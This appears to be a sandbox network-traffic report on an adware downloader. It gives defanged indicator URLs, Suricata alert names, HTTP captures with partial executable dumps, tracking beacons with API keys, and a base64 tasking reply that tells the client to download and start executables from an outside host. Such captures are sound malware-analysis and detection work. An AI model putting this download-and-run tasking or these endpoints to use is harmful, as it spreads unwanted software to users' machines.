hxxp://download.cleanshot.host/download/2/mobilepcstarterkit-uninstaller.exe	94.23.252.37
hxxp://download.cleanshot.host/download/2/wizzrelease.exe	94.23.252.37
hxxp://download.cleanshot.host/download/2/combroadcaster.exe	94.23.252.37
hxxp://download.cleanshot.host/get/4/remote.exe	94.23.252.37
hxxp://agent.wizztrakys.com/api/v5/config	94.23.44.92
hxxp://agent.wizztrakys.com/api/v5/link	94.23.44.92
hxxp://agent.wizztrakys.com/cgi-bin/advert/getkws.cgi?did=11793&version=0&key=azJJ.s8MVPsHc	94.23.44.92
hxxp://download.cleanshot.host/download/3/wizzcaster_installer_v2.exe	94.23.252.37
hxxp://download.cleanshot.host/get/4/updater.exe	94.23.252.37
hxxp://download.cleanshot.host/download/3/wizzcaster_v2.exe	94.23.252.37
hxxp://download.cleanshot.host/download/3/wizzcaster_uninstaller_v2.exe	94.23.252.37
hxxp://agent.wizztrakys.com/tuto/wizzmonetize/buying_installer_mpck_ref015_2_product_download_succeed	94.23.44.92
hxxp://weminternal.com/download/3/wizzcaster_v2.exe	94.23.252.37
hxxp://agent.wizztrakys.com/tuto/wizzmonetize/buying_installer_mpck_ref015_2_wizzproduct_download_succeed	94.23.44.92
hxxp://agent.wizztrakys.com/tuto/wizzmonetize/buying_installer_mpck_ref015_2_product_execute_succeed	94.23.44.92
hxxp://weminternal.com/download/3/wizzcaster_installer_v2.exe	94.23.252.37
hxxp://agent.wizztrakys.com/tuto/wizzmonetize/buying_installer_mpck_ref015_2_product_download_start	94.23.44.92
hxxp://weminternal.com/download/4/replaceUninstaller.exe	94.23.252.37
hxxp://agent.wizztrakys.com/tuto/wizzmonetize/buying_installer_mpck_ref015_2_wizzuninstaller_download_start	94.23.44.92
hxxp://downloadmyhost.com/download/2/wizzproduct.exe	94.23.252.37
hxxp://wizzcaster.com/api/v5/config	176.31.107.87
hxxp://weminternal.com/download/3/wizzcaster_uninstaller_v2.exe	94.23.252.37
hxxp://agent.wizztrakys.com/tuto/wizzmonetize/buying_installer_mpck_ref015_2_wizzuninstaller_download_succeed	94.23.44.92
hxxp://agent.wizztrakys.com/tuto/wizzmonetize/buying_installer_mpck_ref015_2_start	94.23.44.92
hxxp://www.wizzmonetize.com/remotes_xml_sections.php	94.23.44.92
hxxp://agent.wizztrakys.com/tuto/wizzmonetize/buying_installer_mpck_ref015_2_combroadcaster_execute_succeed	94.23.44.92
hxxp://weminternal.com/get/3/wizzcaster_v2.exe	94.23.252.37
hxxp://agent.wizztrakys.com/tuto/wizzmonetize/buying_installer_mpck_ref015_2_wizzproduct_download_start	94.23.44.92
hxxp://downloadmyhost.com/download/2/mobilepcstarterkit-uninstaller.exe	94.23.252.37
hxxp://wizzcaster.com/api/v5/link	176.31.107.87
hxxp://downloadmyhost.com/download/2/mobilepcstarterkit_widget.exe	94.23.252.37
hxxp://downloadmyhost.com/download/2/combroadcaster.exe	94.23.252.37
hxxp://weminternal.com/get/4/remote.exe	94.23.252.37
hxxp://weminternal.com/get/4/updater.exe	94.23.252.37
hxxp://agent.wizztrakys.com/tuto/wizzmonetize/buying_installer_mpck_ref015_2_combroadcaster_download_start	94.23.44.92
hxxp://agent.wizztrakys.com/tuto/wizzmonetize/buying_installer_mpck_ref015_2_done	94.23.44.92
hxxp://ads.adskyforever.com/cgi-bin/advert/getkws.cgi?did=11793&version=0&key=azJJ.s8MVPsHc	176.31.107.87
hxxp://www.tutomonetize.com/remotes_xml_sections.php	188.165.210.24
hxxp://agent.wizztrakys.com/tuto/wizzmonetize/buying_installer_mpck_ref015_2_wizzproduct_execute_succeed	94.23.44.92
hxxp://downloadmyhost.com/download/2/wizzrelease.exe	94.23.252.37
upd.adskyforever.com	176.31.252.74

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET POLICY Signed TLS Certificate with md5WithRSAEncryption
ET MALWARE Adware-Win32/EoRezo Reporting

Traffic

GET /download/3/wizzcaster_v2.exe HTTP/1.1

Host: weminternal.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:57:18 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="wizzcaster_v2.exe"

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
5a400..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
......W.........."...0.................. ........@.. .................
...................@.....................................O............
.......................L..............................................
.. ............... ..H............text........ ...................... 
..`.rsrc...............................@..@.reloc.....................
.........@..B........................H........%...............@...v...
.......................................6.(.....(....*z.,..{....,..{...
.o......(....*z.s....}......(.....r...po....*V.(......}......}....*...
0...........{....(....t.....s.....{......o......r...po.....r...po.....
..ijo .....o!....o".........io#......,..o......o$...t1...o%...s&...o'.
..*......R.._.......0..........(.....s....o......&..*.................
..((...~....%-.&~..........s)...%.....o*...*..0..G.......s ....r[..p..
. 1..r]..p(,...o-.....r]..p.(........(/...(0......X...2..*..(....*..0.
..........(....r[..p.....,Q....(1.......(2......5...%...%....((...o3..
.r...p(4....(5....(.....^o6...(7...&.Q((...o3...r...p(4...(8........i.
2).........(9.....(1.....(:.......(;...i. .s<...z...(....}......(..
..}....*........N..V.......0..B.......~=...r...p.o>.....-.*...(....
r...p(?...o@...r...p(A...oB....oC...*...0..?.......s ......o-.... `...
.Z(D.....{....(E...&..&.. `....{....Z(D... ...........).......~....-.r
...p.....(F...oG...sH........~....*.~....*.......*.~....*..(I...*V
<<< skipped >>>

GET /download/3/wizzcaster_uninstaller_v2.exe HTTP/1.1

Host: weminternal.com

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:57:20 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="wizzcaster_uninstaller_v2.exe"

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
2a00..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
..{..W.........."...0..............2... ...@....@.. ..................
..................@..................................1..O....@........
...............`.......0..............................................
. ............... ..H............text........ ...................... .
.`.rsrc........@......................@..@.reloc.......`.......(......
........@..B.................1......H.......<".............../.....
.........................................6.(.....(....*z.,..{....,..{.
...o......(....*z.s....}......(.....r...po....*.0..........s....o.....
.&..*.................0............."...%..\.o....%.i.Y..."...%....o..
....... ......,..r...p(.......(.......X....i.Y2..(......... ......o...
. ....(.......X.......i2.*..(....*....0..M.......(....o ...(!...... 2.
....o"...r...po#...-...(......&....($.....&....X....i2.*......... ..3.
.......7..?.......~....-.r...p.....(%...o&...s'........~....*.~....*..
.....*.~....*..((...*Vs....()...t.........*BSJB............v2.0.50727.
.....l.......#~..4.......#Strings........t...#US.t.......#GUID........
...#Blob...........W..........3........ ...................)..........
.....................................F...........z.Z...............)..
...............f...................m...8.m.........^.8...:.#...t.W....
.W.....W...Z.Z...F.....].Z.......................#.....#.........Y.W..
.;.#...>.8...K.8...G.8.....W.....W...#.....t.W.................
<<< skipped >>>

GET /get/4/remote.exe HTTP/1.1

Host: weminternal.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:57:06 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="remote.exe"

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
99a00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
.....EX.........."...0..V...B.......t... ........@.. .................
...................@.................................\t..O........>
..........................$s..........................................
..... ............... ..H............text....T... ...V................
.. ..`.rsrc....>.......@...X..............@..@.reloc...............
...............@..B.................t......H.......l#..8............5.
..=...........................................0..>.......s...... ..
..}.....r...p}...........s....s....(......&...(....*...........4......
..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*.~.
...*..(....*Vs....(....t.........*.0..M.......(.....o......s ...%o!...
..o"...o#......(...%..!.o$................(....(%...*....0..5.......s.
......{}.....r...p}...........s....s....(......&..*............1......
.(.....-.r?..ps&...z.('...o(...%-.rO..ps&...z.......%...o)...&*..0....
.......(%.....(*....o ...s,.... o-....s....%.o/...%.o0....(*....o ...o
1.....s2.......s3.....i.6.....%......io4......o"...o"...(5........o6..
.r_..p(7...o8...*..0..........rc..p(.......(......&..*................
.0..:........ .  ..X...{......7...(9....{.....7...(9...}......{....2.*
...0..9.........  ..X...{......7...(9....{.....7...(9...}......{....2.
*...BSJB............v2.0.50727......l.......#~..d.......#Strings......
......#US.........#GUID.......p...#Blob...........WU.........3....
<<< skipped >>>

HEAD /download/2/mobilepcstarterkit-installer.exe HTTP/1.1

Accept: */*

User-Agent: InnoDownloadPlugin/1.4

Host: download.cleanshot.host

Content-Length: 0

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:56:42 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="mobilepcstarterkit-installer.exe"

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Content-Type: application/x-msdownload
....


GET /download/2/mobilepcstarterkit-installer.exe HTTP/1.1

Accept: */*

User-Agent: InnoDownloadPlugin/1.4

Host: download.cleanshot.host

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:56:42 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="mobilepcstarterkit-installer.exe"

Keep-Alive: timeout=10, max=99

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
110400..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L.....EX.........."...0......B......V.... ........@.. ................
.......@............@.....................................O........>
;................... .................................................
...... ............... ..H............text...\.... ...................
... ..`.rsrc....>.......@..................@..@.reloc....... ......
................@..B................8.......H.......l#..8............5
..(............................................0..>.......s...... .
...}.....r...p}...........s....s....(......&...(....*...........4.....
...(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*.~
....*..(....*Vs....(....t.........*.0..M.......(.....o......s ...%o!..
...o"...o#......(...%..!.o$................(....(%...*....0..5.......s
.......{}.....r...p}...........s....s....(......&..*............1.....
..(.....-.r?..ps&...z.('...o(...%-.rO..ps&...z.......%...o)...&*..0...
........(%.....(*....o ...s,.... o-....s....%.o/...%.o0....(*....o ...
o1.....s2.......s3.....i.6.....%......io4......o"...o"...(5........o6.
..r_..p(7...o8...*..0..........rc..p(.......(......&..*...............
..0..:........ .  ..X...{......7...(9....{.....7...(9...}......{....2.
*...0..9.........  ..X...{......7...(9....{.....7...(9...}......{....2
.*...BSJB............v2.0.50727......l.......#~..d.......#Strings.....
.......#US.........#GUID.......p...#Blob...........WU.........3...
<<< skipped >>>

POST /api/v5/config HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: wizzcaster.com

Content-Length: 38

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue
....



uid=57a764d042bf8&days_after_install=0

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:57:22 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

Set-Cookie: laravel_session=e24fa498c5b92167716dc501e82a23f38ca06659; expires=Mon, 05-Dec-2016 19:57:22 GMT; Max-Age=7200; path=/; httponly

Content-Length: 28

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Conte

POST /api/v5/config HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: wizzcaster.com

Content-Length: 38

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue
....



uid=57a764d042bf8&days_after_install=0

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:57:11 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

Set-Cookie: laravel_session=fa5768b2b058b321a40e789e4caa97b0c0203c12; expires=Mon, 05-Dec-2016 19:57:11 GMT; Max-Age=7200; path=/; httponly

Content-Length: 28

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8
{"time_between_prints":"15"}HTTP/1.1 200 OK..Date: Mon, 05 Dec 2016 17
:57:11 GMT..Server: Apache/2.4.10 (Debian)..Cache-Control: no-cache..S
et-Cookie: laravel_session=fa5768b2b058b321a40e789e4caa97b0c0203c12; e
xpires=Mon, 05-Dec-2016 19:57:11 GMT; Max-Age=7200; path=/; httponly..
Content-Length: 28..Keep-Alive: timeout=10, max=100..Connection: Keep-
Alive..Content-Type: text/html; charset=UTF-8..{"time_between_prints":
"15"}....


POST /api/v5/link HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: wizzcaster.com

Content-Length: 17

Expect: 100-continue

HTTP/1.1 100 Continue
....



uid=57a764d042bf8

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:57:13 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

Set-Cookie: laravel_session=23706320fa80e2626e64f765e1b4e58febc54882; expires=Mon, 05-Dec-2016 19:57:13 GMT; Max-Age=7200; path=/; httponly

Content-Length: 59

Content-Type: text/html; charset=UTF-8
{"link":"http:\/\/wizzcaster.com\/redirect\/57a764d042bf8"}HTTP/1.1 20
0 OK..Date: Mon, 05 Dec 2016 17:57:13 GMT..Server: Apache/2.4.10 (Debi
an)..Cache-Control: no-cache..Set-Cookie: laravel_session=23706320fa80
e2626e64f765e1b4e58febc54882; expires=Mon, 05-Dec-2016 19:57:13 GMT; M
ax-Age=7200; path=/; httponly..Content-Length: 59..Content-Type: text/
html; charset=UTF-8..{"link":"http:\/\/wizzcaster.com\/redirect\/57a76
4d042bf8"}..

POST /remotes_xml_sections.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: VVV.wizzmonetize.com

Content-Length: 154

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue
....



remote_id=1&user_name=wemonetize&api_key=e721cfcc-2148-11e6-922f-0cc47
a47968c&buying_product_name=diskpower&buying_partner_name=tuto&buying_
channel_name=1

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:57:14 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=i2pj18hj6ugnj4glu090t25cb4; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Vary: Accept-Encoding

Content-Length: 1580

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8
PHVwZGF0ZXMgcmVmcmVzaD0iNjAiPgoKPHRhc2s DQoNCjxwZXJmb3JtPg0KDQo8ZG93bm
xvYWQgbmFtZT0iYXNhc2EiIHZhbHVlPSJodHRwOi8vd2VtaW50ZXJuYWwuY29tL2Rvd25s
b2FkLzQvcmVwbGFjZVVuaW5zdGFsbGVyLmV4ZSAiIHZlcnNpb249IiIgIHNvZnR3YXJlPS
IiIG5ldD0ieWVzIi8 DQo8cHJvY2VzcyB0eXBlPSJzdGFydCIgbmFtZT0iYXNhc2EiIHZh
bHVlPSJub3R3YWl0IiBwYXJhbXM9IndlIi8 DQo8bW9kIHR5cGU9ImFkZCIgbmFtZT0iYX
Nhc2EiIHZhbHVlPSJlZWV6Ii8 DQoNCjwvcGVyZm9ybT4NCg0KPGNvbmRpdGlvbnM DQoN
Cjxtb2QgdHlwZT0iY2hlY2siIG5hbWU9ImFzYXNhIiB2YWx1ZT0iZWVleiIgbWF0Y2g9Im
ZhbHNlIi8 DQoNCjwvY29uZGl0aW9ucz4NCg0KPC90YXNrPjx0YXNrPg0KDQo8cGVyZm9y
bT4NCg0KPGRvd25sb2FkIG5hbWU9ImNhcyIgdmFsdWU9Imh0dHA6Ly93ZW1pbnRlcm5hbC
5jb20vZG93bmxvYWQvMy93aXp6Y2FzdGVyX2luc3RhbGxlcl92Mi5leGUiIHZlcnNpb249
IiIgIHNvZnR3YXJlPSIiIG5ldD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG
5hbWU9ImNhcyIgdmFsdWU9Im5vdHdhaXQiIHBhcmFtcz0iNTdhNzY0ZDA0MmJmOCIvPg0K
PG1vZCB0eXBlPSJhZGQiIG5hbWU9ImNhc3RlciIgdmFsdWU9IjE2MTIwNSIvPg0KDQo8L3
BlcmZvcm0 DQoNCjxjb25kaXRpb25zPg0KDQo8bW9kIHR5cGU9ImNoZWNrIiBuYW1lPSJj
YXN0ZXIiIHZhbHVlPSIxNjEyMDUiIG1hdGNoPSJmYWxzZSIvPg0KDQo8L2NvbmRpdGlvbn
M DQo8L3Rhc2s PHRhc2s DQoNCjxwZXJmb3JtPg0KDQo8ZG93bmxvYWQgbmFtZT0iYXBw
c29mdCIgdmFsdWU9Imh0dHA6Ly93ZW1pbnRlcm5hbC5jb20vZ2V0LzQvdXBkYXRlci5leG
UiIHZlcnNpb249IiIgIHNvZnR3YXJlPSIiIG5ldD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlw
ZT0ic3RhcnQiIG5hbWU9ImFwcHNvZnQiIHZhbHVlPSJ3YWl0IiBwYXJhbXM9IndlIi8 DQ
o8bW9kIHR5cGU9ImFkZCIgbmFtZT0ibWFqaSIgdmFsdWU9IjA5V3gxNjEyMDUiLz4NCg0K
PC9wZXJmb3JtPg0KDQo8Y29uZGl0aW9ucz4NCg0KPG1vZCB0eXBlPSJjaGVjayIgbmFtZT
0ibWFqaSIgdmFsdWU9IjA5V3gxNjEyMDUiIG1hdGNoPSJmYWxzZSIvPg0KDQo8L2Nv
<<< skipped >>>

GET /download/4/replaceUninstaller.exe HTTP/1.1

Host: weminternal.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:56:57 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="replaceUninstaller.exe"

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
2e00..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
....%X.........."...0..............6... ...@....@.. ..................
..................@.................................\6..O....@........
...............`......$5..............................................
. ............... ..H............text........ ...................... .
.`.rsrc........@......................@..@.reloc.......`.......,......
........@..B.................6......H........"..............l4........
.......................................0..~.........(....o.....~.....(
......~....(....,..*...............(....(....}.......(....-..*.j.{....
n3..{......-....(....-...1..(....*.*..(....*.......*...0............~.
...r...po......,$.r?..po....t#...rO..p(....,....o.....9....(....o ...o
!...("...rS..p(#.....($...,..(%......ru..p(....,.r{..ps&....(....& B..
.r...p(....,.r...ps&....(....&  ...rp..p(....,.rv..ps&....(....&.($...
,.~....r...po'...r?..prO..po(.....&..*.................0..........s)..
...o*.....&.....*.*..................~....-.r...p.....(....o ...s,....
....~....*.~....*.......*.~....*..(-...*Vs....(....t.........*:.(.....
.}....*..0..........s).....{....o*.....&.....*.*................BSJB..
..........v2.0.50727......l.......#~..........#Strings........8...#US.
........#GUID...(...d...#Blob...........W5.........3........).........
......................................................................
......[.....[...M.............u.....u.....u...m.u...9.u...R.u.....
<<< skipped >>>

GET /get/3/wizzcaster_v2.exe HTTP/1.1

Host: weminternal.com

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:56:58 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="wizzcaster_v2.exe"

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
5a400..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
......W.........."...0.................. ........@.. .................
...................@.....................................O............
.......................L..............................................
.. ............... ..H............text........ ...................... 
..`.rsrc...............................@..@.reloc.....................
.........@..B........................H........%...............@...v...
.......................................6.(.....(....*z.,..{....,..{...
.o......(....*z.s....}......(.....r...po....*V.(......}......}....*...
0...........{....(....t.....s.....{......o......r...po.....r...po.....
..ijo .....o!....o".........io#......,..o......o$...t1...o%...s&...o'.
..*......R.._.......0..........(.....s....o......&..*.................
..((...~....%-.&~..........s)...%.....o*...*..0..G.......s ....r[..p..
. 1..r]..p(,...o-.....r]..p.(........(/...(0......X...2..*..(....*..0.
..........(....r[..p.....,Q....(1.......(2......5...%...%....((...o3..
.r...p(4....(5....(.....^o6...(7...&.Q((...o3...r...p(4...(8........i.
2).........(9.....(1.....(:.......(;...i. .s<...z...(....}......(..
..}....*........N..V.......0..B.......~=...r...p.o>.....-.*...(....
r...p(?...o@...r...p(A...oB....oC...*...0..?.......s ......o-.... `...
.Z(D.....{....(E...&..&.. `....{....Z(D... ...........).......~....-.r
...p.....(F...oG...sH........~....*.~....*.......*.~....*..(I...*V
<<< skipped >>>

POST /tuto/wizzmonetize/buying_installer_mpck_ref015_2_start HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: agent.wizztrakys.com

Content-Length: 48

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue
....



user_name=tuto&api_key=aeaze-zeaeaz-eazeaze-aeaz

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:56:50 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=3jhlmo4emmti9q6eqnrag0tpm4; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Content-Length: 29

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}....


POST /tuto/wizzmonetize/buying_installer_mpck_ref015_2_wizzproduct_download_start HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: agent.wizztrakys.com

Content-Length: 48

Expect: 100-continue

HTTP/1.1 100 Continue
....



user_name=tuto&api_key=aeaze-zeaeaz-eazeaze-aeaz

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:56:50 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=06adee0lg4fhg9cdron3q3ktd2; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Content-Length: 29

Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}HTTP/1.1 200 OK..Date: Mon, 05 Dec 2016 1
7:56:50 GMT..Server: Apache/2.4.10 (Debian)..Set-Cookie: PHPSESSID=06a
dee0lg4fhg9cdron3q3ktd2; path=/..Expires: Thu, 19 Nov 1981 08:52:00 GM
T..Cache-Control: no-store, no-cache, must-revalidate, post-check=0, p
re-check=0..Pragma: no-cache..Access-Control-Allow-Origin: *..Content-
Length: 29..Content-Type: text/html; charset=UTF-8..{"message":"Track 
was added"}....


POST /tuto/wizzmonetize/buying_installer_mpck_ref015_2_wizzproduct_download_succeed HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: agent.wizztrakys.com

Content-Length: 48

Expect: 100-continue

HTTP/1.1 100 Continue
....



user_name=tuto&api_key=aeaze-zeaeaz-eazeaze-aeaz

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:56:51 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=9p09irikoc706lktlqtnavnoo0; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Content-Length: 29

Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}HTTP/1.1 200 OK..Date: Mon, 05 Dec 2016 1
7:56:51 GMT..Server: Apache/2.4.10 (Debian)..Set-Cookie: PHPSESSID=9p0
9irikoc706lktlqtnavnoo0; path=/..Expires: Thu, 19 Nov 1981 08:52:00 GM
T..Cache-Control: no-store, no-cache, must-revalidate, post-check=0, p
re-check=0..Pragma: no-cache..Access-Control-Allow-Origin: *..Content-
Length: 29..Content-Type: text/html; charset=UTF-8..{"message":"Track 
was added"}....


POST /tuto/wizzmonetize/buying_installer_mpck_ref015_2_wizzproduct_execute_succeed HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: agent.wizztrakys.com

Content-Length: 48

Expect: 100-continue

HTTP/1.1 100 Continue
....



user_name=tuto&api_key=aeaze-zeaeaz-eazeaze-aeaz

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:56:52 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=f3krk909qt8nkq9a7trn9empq4; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Content-Length: 29

Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}....


POST /tuto/wizzmonetize/buying_installer_mpck_ref015_2_product_download_start HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: agent.wizztrakys.com

Content-Length: 48

Expect: 100-continue

HTTP/1.1 100 Continue
....



user_name=tuto&api_key=aeaze-zeaeaz-eazeaze-aeaz

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:56:52 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=4slhcsagr1t34nbg293ukrblu2; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Content-Length: 29

Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}HTTP/1.1 200 OK..Date: Mon, 05 Dec 2016 1
7:56:52 GMT..Server: Apache/2.4.10 (Debian)..Set-Cookie: PHPSESSID=4sl
hcsagr1t34nbg293ukrblu2; path=/..Expires: Thu, 19 Nov 1981 08:52:00 GM
T..Cache-Control: no-store, no-cache, must-revalidate, post-check=0, p
re-check=0..Pragma: no-cache..Access-Control-Allow-Origin: *..Content-
Length: 29..Content-Type: text/html; charset=UTF-8..{"message":"Track 
was added"}....


POST /tuto/wizzmonetize/buying_installer_mpck_ref015_2_product_download_succeed HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: agent.wizztrakys.com

Content-Length: 48

Expect: 100-continue

HTTP/1.1 100 Continue
....



user_name=tuto&api_key=aeaze-zeaeaz-eazeaze-aeaz

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:56:53 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=1o9038ds6gc7bnjm99s8pip412; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Content-Length: 29

Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}HTTP/1.1 200 OK..Date: Mon, 05 Dec 2016 1
7:56:53 GMT..Server: Apache/2.4.10 (Debian)..Set-Cookie: PHPSESSID=1o9
038ds6gc7bnjm99s8pip412; path=/..Expires: Thu, 19 Nov 1981 08:52:00 GM
T..Cache-Control: no-store, no-cache, must-revalidate, post-check=0, p
re-check=0..Pragma: no-cache..Access-Control-Allow-Origin: *..Content-
Length: 29..Content-Type: text/html; charset=UTF-8..{"message":"Track 
was added"}....


POST /tuto/wizzmonetize/buying_installer_mpck_ref015_2_product_execute_succeed HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: agent.wizztrakys.com

Content-Length: 48

Expect: 100-continue

HTTP/1.1 100 Continue
....



user_name=tuto&api_key=aeaze-zeaeaz-eazeaze-aeaz

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:56:58 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=la88n5jd8ent88pmik3ce9hja4; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Content-Length: 29

Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}....


POST /tuto/wizzmonetize/buying_installer_mpck_ref015_2_wizzuninstaller_download_start HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: agent.wizztrakys.com

Content-Length: 48

Expect: 100-continue

HTTP/1.1 100 Continue
....



user_name=tuto&api_key=aeaze-zeaeaz-eazeaze-aeaz

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:56:58 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=ptg77gs5q0vju01ma19d7js214; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Content-Length: 29

Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}HTTP/1.1 200 OK..Date: Mon, 05 Dec 2016 1
7:56:58 GMT..Server: Apache/2.4.10 (Debian)..Set-Cookie: PHPSESSID=ptg
77gs5q0vju01ma19d7js214; path=/..Expires: Thu, 19 Nov 1981 08:52:00 GM
T..Cache-Control: no-store, no-cache, must-revalidate, post-check=0, p
re-check=0..Pragma: no-cache..Access-Control-Allow-Origin: *..Content-
Length: 29..Content-Type: text/html; charset=UTF-8..{"message":"Track 
was added"}....


POST /tuto/wizzmonetize/buying_installer_mpck_ref015_2_wizzuninstaller_download_succeed HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: agent.wizztrakys.com

Content-Length: 48

Expect: 100-continue

